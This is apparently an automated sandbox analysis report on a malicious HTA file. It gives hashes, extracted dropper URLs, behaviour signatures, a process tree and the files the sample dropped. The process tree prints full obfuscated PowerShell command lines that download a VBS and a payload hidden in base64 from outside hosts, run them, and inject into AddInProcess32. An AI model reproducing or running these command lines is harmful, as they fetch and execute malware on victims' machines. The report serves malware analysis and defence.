Analysis

  • max time kernel
    105s
  • max time network
    111s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    26-10-2024 02:31

General

  • Target

    b8e2fc58afa34cd0e92aa8a763d8cd49e240b47330eb2da9651e04150bd04948.hta

  • Size

    130KB

  • MD5

    401fa9878282b2404925d1ac2599b7c0

  • SHA1

    876d5ea4b89ef48cd614fc098154e3e2caa176f3

  • SHA256

    b8e2fc58afa34cd0e92aa8a763d8cd49e240b47330eb2da9651e04150bd04948

  • SHA512

    45e2de1e196ae5339df31581bd8e98af094ab461f80269a815f369e51e131a885bb9745c60375aa4c95db75e82d58f799c5ae480ac2aa0b8387baa2aea2d0f63

  • SSDEEP

    96:Eam73bDpMZMY9pMZMUyOX/DJfqMtJNpMZMVx7T:Ea23bDCuY9Cuitht/CuV9T

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\b8e2fc58afa34cd0e92aa8a763d8cd49e240b47330eb2da9651e04150bd04948.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1268
    • C:\Windows\SysWOW64\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE
      "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2052
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2808
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rq4dsw_v.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2868
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES844E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC844D.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2856
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:564
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2456
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2336

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES844E.tmp

    Filesize

    1KB

    MD5

    75e41c8e72a840ec1309fafff688e806

    SHA1

    09bd604d481c0787bb21d709992e2661fa77c209

    SHA256

    a95438054bf9fc1750cbab3e2b41b1c45af3a85d30334362cf4e52ed68f75d83

    SHA512

    8919691099a040900fe5c0d18e1c99e0bd954d7f5d7f8bf7edffac06d49275502b236b1b8bdfb1ea1021ff2739d36a161417f7a99a3d437a968710ad8828f5ab

  • C:\Users\Admin\AppData\Local\Temp\rq4dsw_v.dll

    Filesize

    3KB

    MD5

    5e9058699bc1628799556d81f0580a69

    SHA1

    701a6c0cfc3cdcee5a78a0e75f128a4e2f468d14

    SHA256

    a6fd8561ff61453a6851423a6e6b90c267db98fd7d1afb6bd037ec1f01827fc5

    SHA512

    8322b571ae4eedb6c7543fda6fae9ac205c39ac40b60d3eef846f9b9c8756e35bbca7269368fb1236f44ac9683441f4a3c51414dca760b1589da118788447477

  • C:\Users\Admin\AppData\Local\Temp\rq4dsw_v.pdb

    Filesize

    7KB

    MD5

    82bd584357c188c891e0a1c9cb0bbe5d

    SHA1

    774fdf85ac4b6c107c9ce278a56668e08ee96124

    SHA256

    512555548063d2ba992f23393002abca2bb626d1d58cec5dfe92a175e3baceed

    SHA512

    586479f4ff0c978f5bdd63b8ca5ff1fc40d2c24a1e9e463172d4f51a5d243e231480eb24bc5b60b6bc6a0aa8c08af7a9e05f1cb8a59a9ff454eb25fd0a521c49

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    6bb013f7e81198c190a498c1e1d10c14

    SHA1

    c68c5f61c179beff018959bb6b4a609727e1251c

    SHA256

    bdfb4cc49a1e39675054a977f891cc2e623e45a84b0b126f3ed17036cc7a3e55

    SHA512

    eb9d534c2a41a0e0c9f0e7ddefd55ada91b25ea07e9dae6ee668b86f8a2bfdac5cf702d7eeb58327fb5acb9af5b8b65da301202b59bf4a30ebfc0cd947e83145

  • C:\Users\Admin\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS

    Filesize

    137KB

    MD5

    fe9e18e3366ca7ac8c21eb1ce0631d9c

    SHA1

    51bc2bc37e87e2d64129cad63df697a68ee3b9d6

    SHA256

    01c6399fc31b4cbfcf8e851ff3ff433d36b46da2577f9230b9c78b2cbf790912

    SHA512

    7dca4fb22f5f1a6e08f6c993a7b159863b8b1a8898429aed78582641bc2340ce2fbe3e92f6ec5f9d6ec5c74a14009f77ce87602bea7ba59c4ea1e092d5a9f8f7

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC844D.tmp

    Filesize

    652B

    MD5

    a2f6110e50cf63dff9861a3335041f8b

    SHA1

    0959c6407c33fbdcddf559da607cb49d0de1ab38

    SHA256

    89d46da0812bc820577fc0354f4cd58bd1dfea5b894f8fd02bad12dc39729611

    SHA512

    e7347265f7a74d415dbafbb83f90f2910cd6e476dcb19358361928185a4ff7e4b27f63a3009b29334802b9f846cb15fdd4b45078bf6d6981d3e8874960a810e9

  • \??\c:\Users\Admin\AppData\Local\Temp\rq4dsw_v.0.cs

    Filesize

    471B

    MD5

    465b774d7a1a641088ff65cb56d1755b

    SHA1

    d65ff3c3ecd67b7da02d199d649abb75a8c64879

    SHA256

    737ceb1cff20744c7d2eb5139717221cf2c96f10d05d5fffd3d916fd69a6d025

    SHA512

    665f11dfa5a6a79b89c49724ad1943baea2ea54cb204ef3712abb948218064410b42ee96b29f067fc635bc71ec85295603567bf2e9121d381fa2dfbc6c07ea68

  • \??\c:\Users\Admin\AppData\Local\Temp\rq4dsw_v.cmdline

    Filesize

    309B

    MD5

    bce9dbc1dde307346f8e429d852fce88

    SHA1

    222e2083374d8718eabd2a35cdf3c0a97ca28138

    SHA256

    66f2e3554fd1f5be18a880bb325d792880e27948baf0a64036a1aa2b0ce013db

    SHA512

    ec545b9f0f2f42a55ed6d24471d767b6606b8f26afb3ce23e6516200596c62640cbcb48f494bd109afc73ef299269608ca2ba0eb268a5d8fed8e89800b6671ec